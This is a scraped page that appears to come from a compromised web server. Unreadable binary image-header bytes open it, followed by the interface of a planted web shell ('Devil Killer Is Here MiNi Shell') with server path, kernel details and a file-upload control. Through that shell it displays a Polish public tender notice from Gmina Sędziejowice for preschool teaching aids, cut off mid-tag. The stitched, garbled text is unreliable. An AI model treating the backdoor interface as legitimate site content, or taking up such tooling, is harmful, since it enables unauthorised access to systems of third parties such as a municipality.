JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20240627/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20240627/0038532101-N-2024.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Dostawy<br/> „Zakup i dostawa pomocy dydaktycznych” </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">GMINA SĘDZIEJOWICE</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 730934594</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">ul. Wieluńska 6</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Sędziejowice</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">98-160</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">łódzkie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL714 - Sieradzki</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">zamowienia@gminasedziejowice.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">http://gminasedziejowice.eu/</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - jednostka samorządu terytorialnego</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Ogólne usługi publiczne</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> „Zakup i dostawa pomocy dydaktycznych” </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-8aa092fa-344d-11ef-acf6-4e696a6d8c25</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2024/BZP 00385321</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2024-06-27</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2024/BZP 00029615/04/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.2.3 Zakup i dostawa pomocy dydaktycznych</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.15.) Nazwa projektu lub programu</h3> <p class="mb-0"> Projekt pn.: „Nowoczesne przedszkole w Gminie Sędziejowice” z udziałem środków Europejskiego Funduszu Społecznego Plus w ramach Programu Regionalnego Fundusze Europejskie dla Łódzkiego 2021 – 2027 </p> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://platformazakupowa.pl/pn/gmina_sedziejowice <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">W postępowaniu o udzielenie zamówienia komunikacja między Zamawiającym a Wykonawcami w szczególności składanie oświadczeń, wniosków (innych niż oferta), zawiadomień oraz przekazywanie informacji odbywa się elektronicznie za pośrednictwem https://platformazakupowa.pl/pn/gmina_sedziejowice i formularza Wyślij wiadomość dostępnego na stronie dotyczącej danego postępowania. W sytuacjach awaryjnych np. w przypadku niedziałania platformazakupowa.pl Zamawiający może również komunikować się z wykonawcami za pomocą poczty elektronicznej: zamowienia@gminasedziejowice.pl</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">1)Wymagania techniczne i organizacyjne wysyłania i odbierania dok. elektronicznych, elektronicznych kopii dok. i oświadczeń oraz inf. przekazywanych przy ich użyciu opisane zostały w Regulaminie Internetowej Platformy platformazakupowa.pl Open Nexus Sp.z o.o. korzystania z <br/>https://platformazakupowa.pl/ i są dostępne przy każdym postępowaniu na platformie, regulamin platformy znajduje się w stopce strony lub pod adresem: https://platformazakupowa.pl/strona/1- regulamin 2)Za datę przekazania oferty, zawiadomień, dok. elektronicznych, oświadczeń lub elektronicznych kopii dok. lub oświadczeń oraz innych inf. przyjmuje się datę ich przekazania na<br/>https://platformazakupowa.pl/ i otrzymania komunikatu potwierdzającego.3)Formaty plików wykorzystywanych przez Wykonawców powinny być zgodne z OBWIESZCZENIEM PREZESA RADY MINISTRÓW z dn. 9 listopada 2017r. ws. ogłoszenia jednolitego tekstu rozporządzenia Rady Ministrów w sprawie Krajowych Ram Interoperacyjności, minimalnych wymagań dla rejestrów publicznych i wymiany informacji w postaci elektronicznej oraz minimalnych wymagań dla systemów teleinformatycznych. 4)Zamawiający rekomenduje wykorzystanie formatów: .pdf .doc .xls .jpg (.jpeg)ze szczególnym wskazaniem na .pdf 5)W celu ewen. kompresji danych Zamawiający rekomenduje wykorzystanie jednego z formatów: a).zip b).7Z 6)Wśród formatów powszechnych a NIE występujących w rozporządzeniu występują:.rar .gif .bmp. Dokumenty złożone w takich plikach zostaną uznane za złożone nieskutecznie.7)Zamawiający zwraca uwagę na ograniczenia wielkości plików podpisywanych profilem zaufanym, który wynosi maks. 10 MB, oraz na ograniczenie wielkości plików podpisywanych w aplikacji eDoApp służącej do składania podpisu osobistego,który wynosi max 5MB. 8)Zalecenia Zamawiającego odnośnie kwalifikowanego podpisu elektronicznego:a)dla dokumentów w formacie „pdf” zaleca się podpis w formatem PadES,b)dokumenty w formacie innym niż „pdf” zaleca się podpisywać formatem XadES,c)do składania podpisu zaleca się stosowanie algorytmu SHA-2 (lub wyższy).9)Jeśli wykonawca pakuje dokumenty np. w plik ZIP zalecamy wcześniejsze podpisanie każdego ze skompresowanych plików. 10)Zamawiający rekomenduje wykorzystanie podpisu z kwalifikowanym znacznikiem czasu.11)Zamawiający zaleca, aby nie wprowadzać jakichkolwiek zmian w plikach po podpisaniu ich. Może to skutkować brakiem integralności plików. 12)Zamawiający zaleca, aby w przypadku podpisywania pliku przez kilka osób, stosować podpisy tego samego rodzaju. Podpisywanie różnymi rodzajami podpisów np. osobistym i kwalifikowanym może doprowadzić do problemów w weryfikacji plików. 13)Komunikacja za pośrednictwem platformy zakupowej wymaga założenia konta Użytkownika. 14)W celu założenia konta Użytkownika na platformie zakupowej, koniecznym jest posiadanie przez Wykonawcę aktywnego e-maila.Korzystanie z platformy zakupowej przez Wykonawcę jest bezpłatne.15)Wymagania dot. specyfikacji połączenia, formatu przesyłanych danych oraz szyfrowania i oznaczania czasu przekazania i odbioru danych za pośrednictwem platformazakupowa.pl,tj.: a)stały dostęp do sieci Internet o gwarantowanej przepustowości nie mniejszej niż 512 kb/s,b)komputer klasy PC lub MAC o następującej konfiguracji: pamięć min. 2 GB Ram, procesor Intel IV 2 GHZ lub jego nowsza wersja, jeden z systemów operacyjnych - MS Windows 7,<br/>Mac Os x 10 4, Linux, lub ich nowsze wersje,c)zainstalowana dowolna przeglądarka internetowa, Uwaga:od dn. 17.08.2021, ze względu na zakończenie wspierania przeglądarki Internet Explorer przez firmę Microsoft, stosowanie przeglądarki Internet Explorer nie będzie dopuszczalne d)włączona<br/>obsługa JavaScript, e)zainstalowany program Adobe Acrobat Reader lub inny obsługujący format plików .pdf,f)Platforma działa według standardu przyjętego w komunikacji sieciowej - kodowanie UTF8,g)Oznaczenie czasu odbioru danych przez platformę zakupową stanowi datę oraz dokładny czas (hh:mm:ss)gen. wg.czasu lokalnego serwera synchronizowanego z zegarem Gł.Urzędu Miar.</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Zgodnie z art. 13 ust. 1 i 2 rozporządzenia Parlamentu Europejskiego i Rady (UE) 2016/679 z dnia 27 kwietnia 2016 r. w sprawie ochrony osób fizycznych w związku z przetwarzaniem danych osobowych i w sprawie swobodnego przepływu takich danych oraz uchylenia dyrektywy 95/46/WE (ogólne rozporządzenie o ochronie danych) (Dz. Urz. UE L 119 z 04.05.2016, str. 1), dalej „RODO”, informuję, że:<br/><br/>1) administratorem Pani/Pana danych osobowych jest<br/>Gmina Sędziejowice<br/>ul. Wieluńska 6<br/>98 – 160 Sędziejowice<br/>tel. 43 / 677 10 02<br/>fax. 43 / 677 10 06<br/>2) z inspektorem ochrony danych osobowych w Gminie Sędziejowice można kontaktować się za pomocą adresu iod@gminasedziejowice.pl;<br/>3) Pani/Pana dane osobowe przetwarzane będą na podstawie art. 6 ust. 1 lit. c RODO w celu związanym z postępowaniem o udzielenie zamówienia publicznego pn. „Zakup i dostawa pomocy dydaktycznych” realizowanym w ramach projektu pn.: „Nowoczesne przedszkole w Gminie Sędziejowice” z udziałem środków Europejskiego Funduszu Społecznego Plus w ramach Programu Regionalnego Fundusze Europejskie dla Łódzkiego 2021 – 2027, znak postępowania RW.VI.271.13.2024 prowadzonym w trybie podstawowym, o którym mowa w art. 275 pkt 1 ustawy PZP;<br/>4)	odbiorcami Pani/Pana danych osobowych będą osoby lub podmioty, którym udostępniona zostanie dokumentacja postępowania w oparciu o art. 74 ustawy z dnia 11 września 2019 r. – Prawo zamówień publicznych (Dz. U. z 2023 r. poz. 1605 ze zm.), dalej „ustawa Pzp”;<br/>5)	Pani/Pana dane osobowe będą przechowywane, zgodnie z art. 78 ust. 1 ustawy Pzp, przez okres 4 lat od dnia zakończenia postępowania o udzielenie zamówienia, a jeżeli czas trwania umowy przekracza 4 lata, okres przechowywania obejmuje cały czas trwania umowy;<br/>6)	obowiązek podania przez Panią/Pana danych osobowych bezpośrednio Pani/Pana dotyczących jest wymogiem ustawowym określonym w przepisach ustawy Pzp, związanym z udziałem w postępowaniu o udzielenie zamówienia publicznego; konsekwencje niepodania określonych danych wynikają z ustawy Pzp;<br/>7)	w odniesieniu do Pani/Pana danych osobowych decyzje nie będą podejmowane w sposób zautomatyzowany, stosowanie do art. 22 RODO;<br/>8)	posiada Pani/Pan:<br/>a.	na podstawie art. 15 RODO prawo dostępu do danych osobowych Pani/Pana dotyczących;<br/>b.	na podstawie art. 16 RODO prawo do sprostowania Pani/Pana danych osobowych **;<br/>c.	na podstawie art. 18 RODO prawo żądania od administratora ograniczenia przetwarzania danych osobowych z zastrzeżeniem przypadków, o których mowa w art. 18 ust. 2 RODO ***;<br/>d.	prawo do wniesienia skargi do Prezesa Urzędu Ochrony Danych Osobowych, gdy uzna Pani/Pan, że przetwarzanie danych osobowych Pani/Pana dotyczących narusza przepisy RODO;<br/>9)	nie przysługuje Pani/Panu:<br/>a.	w związku z art. 17 ust. 3 lit. b, d lub e RODO prawo do usunięcia danych osobowych;<br/>b.	prawo do przenoszenia danych osobowych, o którym mowa w art. 20 RODO;<br/>c.	na podstawie art. 21 RODO prawo sprzeciwu, wobec przetwarzania danych osobowych, gdyż podstawą prawną przetwarzania Pani/Pana danych osobowych jest art. 6 ust. 1 lit. c RODO.<br/>** Wyjaśnienie: skorzystanie z prawa do sprostowania nie może skutkować zmianą wyniku postępowania<br/>o udzielenie zamówienia publicznego ani zmianą postanowień umowy w zakresie niezgodnym z ustawą Pzp oraz nie może naruszać integralności protokołu oraz jego załączników.<br/>*** Wyjaśnienie: prawo do ograniczenia przetwarzania nie ma zastosowania w odniesieniu do przechowywania, w celu zapewnienia korzystania ze środków ochrony prawnej lub w celu ochrony praw innej osoby fizycznej lub prawnej, lub z uwagi na ważne względy interesu publicznego Unii Europejskiej lub państwa członkowskiego.</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">RW.VI.271.13.2024</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Dostawy</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.9.) Liczba części: <span class="normal">7</span></h3> <h3 class="mb-0">4.1.10.) Ofertę można składać na wszystkie części</h3> <h3 class="mb-0">4.1.11.) Zamawiający ogranicza liczbę części zamówienia, którą można udzielić jednemu wykonawcy: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="p-2 mt-4 bg-light">Część 1</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Część 1 zamówienia - przedmiotem zamówienia jest dostawa pomocy dydaktycznych i sprzętu do realizacji zajęć z terapii sensorycznej do realizatora projektu Zespołu Szkół Ogólnokształcących Nr 1 im. Powstańców 1863r. w Sędziejowicach, ul. Powstańców 1863 r. nr 6, 98 – 160 Sędziejowice. Wszystkie materiały stanowiące przedmiot zamówienia muszą być oryginalne, profesjonalne i fabrycznie nowe, wysokiej jakości, sprawne, wolne od jakichkolwiek wad fizycznych, jak również od jakichkolwiek wad prawnych i roszczeń osób trzecich, nie używane, nie powystawowe, nie regenerowane. Pod pojęciem fabrycznie nowe Zamawiający rozumie produkty wykonane z nowych elementów, bez śladu uszkodzenia, w oryginalnych opakowaniach producenta, z widocznym logo, symbolem produktu. Dostarczone materiały muszą być zgodnie z obowiązującymi normami i posiadać wymagane atesty, certyfikaty, aprobaty techniczne, deklaracje zgodności, świadectwa bezpieczeństwa, homologacje, licencje itp.<br/>Elementy zestawu:<br/>1. Stolik podświetlany. Zmieniający kolory stolik z podwyższoną krawędzią sprawdzi się do nauki poprzez zabawę i eksplorację sensoryczną.<br/>• wys. 45 cm<br/>• śr. 69 cm<br/>•. pow. robocza 60 cm<br/>2. Deska rotacyjna <br/>•	Szerokość - 50cm <br/>•	Wysokość - 10cm <br/>•	Maksymalne obciążenie - 95kg <br/>3. Obciążniki na nadgarstki 2 x 0,20 kg<br/>4. Zestaw do treningu zapachowego. Duży zestaw zapachowy<br/>W skład zestawu wchodzi 15 owocowych zapachów. 8 zapachów wyciszających oraz 7 zapachów pobudzających, 30 kart oraz drewniana skrzynka. Każdy zapach posiada dwie karty, jedna karta przedstawia owoc w całości a druga karta owoc przepołowiony.<br/>5. Woreczki sensoryczne zestaw :<br/>•	6 milutkich woreczków sensorycznych z różnymi wypełnieniami <br/>•	pokrowce pozwalające zachować czystość.<br/>6. Sensoryczna pogoda: <br/>•	minimum 7 drewnianych plansz wypełnionych wypukłymi elementami,<br/>•	6 małych drewnianych tabliczek,<br/>•	6 obustronnie zadrukowanych kart ( jedna strona w kolorze, druga czarno-biała),<br/>•	1 mini książeczka z propozycjami zabaw.<br/>7. Pudełko dotknij i zgadnij: pudełko ze sklejki z otworami na dłonie zapewnia wiele możliwości do zabaw sensorycznych i opisu drewnianych kształtów ukrytych w pudełku. Kształty oraz tacki w zestawie z pudełkiem. Rozmiar 36 × 30 × 16 cm<br/>8. Ścieżka sensoryczna: wypełnienie kamień biały, przekątna dysku 35 cm. <br/>9. Skrzynka zgadula o wymiarach 35,5 x 21,5 x 21,5 cm,<br/>10. Sensoryczne tabliczki z minimum 20 sztukami tabliczek i 10 kart,<br/>11. Panel świetlny A3 z dźwiękiem z minimum 12 opcjami kolorystycznymi i 30 sekundową funkcją nagrywania głosu,<br/>10. Ścianka wspinaczkowa wiosna: <br/>• wymiary modułu - 246 x 123 x 1,8 cm<br/>• wymiary kompletu - 246 x 466 x 1,8 cm<br/>• materiał - atestowana sklejka wodoodporna + nadruk UV<br/>• lakiery i materiały wykończeniowe zgodne z normami, gwarantują wysoką odporność powierzchni na ścieranie<br/>• każdy z modułów posiada siatkę otworów (w odległości 20 x 20 cm), które dają możliwość swobodnego wyboru rozmieszczenia chwytów<br/>• maksymalne obciążenie 70 kg<br/>11. Labirynt na nogi ślimaczek,<br/>12. Podesty wielofunkcyjne terapeutyczne : zestaw podestów, z których można korzystać osobno lub używać ich jako schodów (pod każdym podestem jest belka, dzięki której schody nie będą się rozsuwać). Wykonane ze sklejki. 6 podestów, które można umieścić jeden pod drugim.<br/>• wym. od 74 x 47 x 68 cm do 39 x 26 x 12 cm<br/>13. Maglownica do terapii zaburzeń SI: <br/>•	Długość - 115cm <br/>•	Szerokość - 85cm <br/>•	Wysokość - 40cm <br/>•	Maksymalne obciążenie - 95kg <br/>14. Skrzynia gimnastyczna wykonana ze sklejki, składająca się z 5 części o wymiarach :<br/>- długość podstawy: 133 cm<br/>- długość poduszki: 139 cm<br/>- szerokość podstawy: 73 cm<br/>- szerokość poduszki: 41 cm<br/>- wysokość z poduszką: 102 cm<br/>- dodatkowe wyposażenie wózek transportowy.<br/>15. Podświetlane panele podłogowe, szt. 3. (czerwony, niebieski, żółty). </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">39162100-6 - Pomoce dydaktyczne</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">39162000-5 - Pomoce naukowe</p> <p class="mb-0">39162110-9 - Sprzęt dydaktyczny</p> <p class="mb-0">37000000-8 - Instrumenty muzyczne, artykuły sportowe, gry, zabawki, wyroby rzemieślnicze, materiały i akcesoria artystyczne</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">21 dni</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">1. Przy dokonywaniu wyboru najkorzystniejszej oferty Zamawiający będzie stosować następujące kryteria oceny ofert:<br/>	Cena – 60%,<br/>	Termin realizacji dostawy – 40%.<br/><br/>2. Punkty przyznane w ramach kryterium „Cena” (C) zostaną obliczone według wzoru:<br/>C=C_min/C_b ×60pkt<br/>gdzie:<br/>	C – liczba punktów, którą uzyskała badana oferta w kryterium „Cena”,<br/>	Cmin – cena (cena ofertowa brutto w ramach poszczególnych zadań) najtańszej oferty spośród ofert nieodrzuconych,<br/>	Cb – cena (cena ofertowa brutto) badanej oferty spośród ofert nieodrzuconych.<br/>Maksymalnie można uzyskać 60 punktów. Przyznane punkty zostaną zaokrąglone do dwóch miejsc po przecinku.<br/><br/>3. Punkty przyznane w ramach kryterium „Termin realizacji dostawy” (D) zostaną przyznane według wzoru:<br/>D=D_min/D_z ×40pkt<br/>gdzie:<br/>	D – liczba punktów, którą uzyskała badana oferta w kryterium „Termin realizacji dostawy”,<br/>	Dz – termin realizacji dostawy zadeklarowany w ocenianej ofercie,<br/>	Dmin – najkrótszy termin realizacji dostawy spośród nieodrzuconych ofert.<br/>W tym kryterium można uzyskać maksymalnie 40 punktów Przyznane punkty zostaną zaokrąglone do dwóch miejsc po przecinku.<br/>UWAGA:<br/>	Najkrótszy możliwy termin realizacji dostawy wymagany przez Zamawiającego: 7 dni od daty podpisania umowy.<br/>	Najdłuższy możliwy termin realizacji dostawy: 21 dni od daty podpisania umowy.<br/>	Wykonawca może zaproponować termin realizacji dostawy w przedziale od 7 do 21 dni od daty podpisania umowy. Zaoferowany przez Wykonawcę termin realizacji dostawy zostanie uwzględniony w umowie.<br/>	Wykonawca, który zaoferuje najkorzystniejszy termin realizacji dostawy (7 dni od daty podpisania umowy) otrzyma maksymalną ilość punktów – 40 punktów.<br/>	Wykonawca, który zaoferuje termin realizacji dostawy w ciągu 21 dni od daty podpisania umowy - otrzymuje 0 pkt.<br/>	Pozostali Wykonawcy (tj. Wykonawcy, którzy zaproponowali wartość pośrednią, pomiędzy wartością najkorzystniejszą a najmniej korzystną), otrzymują liczbę punktów (D) obliczoną wg powyższego wzoru.<br/><br/>4. Za najkorzystniejszą zostanie uznana oferta, która uzyska łącznie największą liczbę punktów (P) wyliczona zgodnie z poniższym wzorem:<br/>P=C+D<br/>	gdzie:<br/>	P – łączna liczba punktów ocenianej oferty,<br/>	C – liczba punktów uzyskanych w ramach kryterium „Cena”,<br/>	D – liczba punktów uzyskanych w ramach kryterium „Termin realizacji dostawy”,<br/>5. Zamawiający udzieli zamówienia Wykonawcy, którego oferta odpowiada wszystkim wymaganiom określonym w ustawie i w SWZ oraz została oceniona jako najkorzystniejsza, czyli uzyskała najwyższą ilość punktów w określonych powyżej kryteriach.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">serwis posprzedażny, pomoc techniczna, warunki dostawy takich jak termin, sposób lub czas dostawy, oraz okresu realizacji.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Termin realizacji dostawy</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span 